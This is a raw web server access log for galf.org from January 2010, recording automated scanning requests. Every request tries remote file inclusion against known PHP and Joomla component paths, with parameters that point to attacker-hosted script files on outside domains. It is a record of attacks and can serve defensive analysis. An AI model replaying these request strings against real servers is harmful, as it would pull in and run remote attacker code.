74.223.143.131 - - [17/Jan/2010:20:36:00 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:00 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:00 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:00 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:01 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:01 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:17 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:17 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:23 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:36:36 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:36:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:20:36:54 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:20:36:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.142.208.150 - - [17/Jan/2010:20:37:13 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:20:37:13 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:20:37:13 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:37:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:20:37:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:20:37:28 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:20:37:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:20:37:43 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.149.85.32 - - [17/Jan/2010:20:37:43 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.142.208.150 - - [17/Jan/2010:20:37:52 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:20:41:17 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:41:33 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:41:33 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:41:33 -0800] "GET /logs/access.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:41:49 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:41:49 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:41:50 -0800] "GET /logs/access.log/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:42:05 -0800] "GET /logs/access.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:42:05 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:42:06 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:20:42:10 -0800] "GET /logs/access.log//forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:20:42:10 -0800] "GET /forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:20:42:10 -0800] "GET /logs//forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:42:19 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:42:19 -0800] "GET /logs/access.log%20%20/?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:20:42:21 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:20:44:13 -0800] "GET /logs/access_090928.log//forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:20:45:36 -0800] "GET /logs/access.log//forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:20:45:37 -0800] "GET /forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:20:45:37 -0800] "GET /logs//forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:20:47:11 -0800] "GET /logs/access_090928.log//forum/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:47:23 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:47:23 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:47:23 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:47:23 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:20:49:10 -0800] "GET /logs/access_090803.log//foro/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:20:49:10 -0800] "GET /foro/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:20:49:10 -0800] "GET /logs//foro/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:49:19 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:49:19 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:49:19 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:49:19 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:20:49:54 -0800] "GET /logs/access_090803.log//foro/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:20:49:54 -0800] "GET /foro/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:20:49:55 -0800] "GET /logs//foro/?sourcedir=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:06 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:06 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:06 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:07 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:33 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:33 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:33 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:33 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:50 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:50 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:50 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:50 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:50 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:50 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:50 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:52:55 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:53:01 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:53:01 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:53:01 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:53:01 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:53:24 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:53:24 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:53:24 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:20:53:24 -0800] "GET /logs/access_091026.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.236.85.228 - - [17/Jan/2010:20:54:21 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
199.236.85.228 - - [17/Jan/2010:20:54:22 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:54:37 -0800] "GET /logs/access_090928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:54:43 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:54:44 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:54:44 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:20:54:48 -0800] "GET /logs/access_091012.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.236.85.228 - - [17/Jan/2010:20:56:21 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "galf.org"
199.236.85.228 - - [17/Jan/2010:20:56:23 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://cosmeticawards.com/submit/file/mini.htm??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "galf.org"
72.34.235.197 - - [17/Jan/2010:20:58:13 -0800] "GET /administrator/templates/errors.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:58:13 -0800] "GET /logs/administrator/templates/errors.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:20:58:13 -0800] "GET /logs/access_090629.log/administrator/templates/errors.php?error=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.69.200.207 - - [17/Jan/2010:20:58:39 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.shanyrack.com/forum/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.69.200.207 - - [17/Jan/2010:20:58:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.shanyrack.com/forum/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.69.200.207 - - [17/Jan/2010:20:58:39 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.shanyrack.com/forum/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
59.125.5.1 - - [17/Jan/2010:21:00:14 -0800] "GET //////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 200 1064 "-" "Mozilla/5.0" "www.galf.org"
59.125.5.1 - - [17/Jan/2010:21:00:15 -0800] "GET /logs///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "www.galf.org"
59.125.5.1 - - [17/Jan/2010:21:00:15 -0800] "GET /logs/access.log///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:00:36 -0800] "GET //////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 1064 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:00:36 -0800] "GET /logs/access.log///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:00:36 -0800] "GET /logs///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "www.galf.org"
209.126.254.164 - - [17/Jan/2010:21:00:44 -0800] "GET /logs/access_090928.log////?path=http://www.noin9191.com/ams/ammember/rfi1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
209.126.254.164 - - [17/Jan/2010:21:00:44 -0800] "GET ///?path=http://www.noin9191.com/ams/ammember/rfi1.txt?? HTTP/1.1" 200 1049 "-" "libwww-perl/5.76" "www.galf.org"
209.126.254.164 - - [17/Jan/2010:21:00:44 -0800] "GET /logs////?path=http://www.noin9191.com/ams/ammember/rfi1.txt?? HTTP/1.1" 200 4806 "-" "libwww-perl/5.76" "www.galf.org"
59.125.5.1 - - [17/Jan/2010:21:00:51 -0800] "GET /logs/access.log%20%20///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
59.125.5.1 - - [17/Jan/2010:21:00:52 -0800] "GET /logs///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "www.galf.org"
59.125.5.1 - - [17/Jan/2010:21:00:52 -0800] "GET //////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 200 1064 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:01:05 -0800] "GET /logs///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:01:05 -0800] "GET /logs/access.log///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:01:05 -0800] "GET //////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 1064 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:01:26 -0800] "GET /logs/access.log///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:01:26 -0800] "GET /logs/access.log%20%20///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:01:27 -0800] "GET /logs///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 4821 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:01:27 -0800] "GET //////////////////?_SERVER[DOCUMENT_ROOT]=http://www.hfsb.org/sites/10225/img/.patch/id1.txt? HTTP/1.1" 200 1064 "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:02:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:02:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:02:13 -0800] "GET /logs/access_091130.log//tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:02:13 -0800] "GET /logs/access_091109.log//tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:21:02:33 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
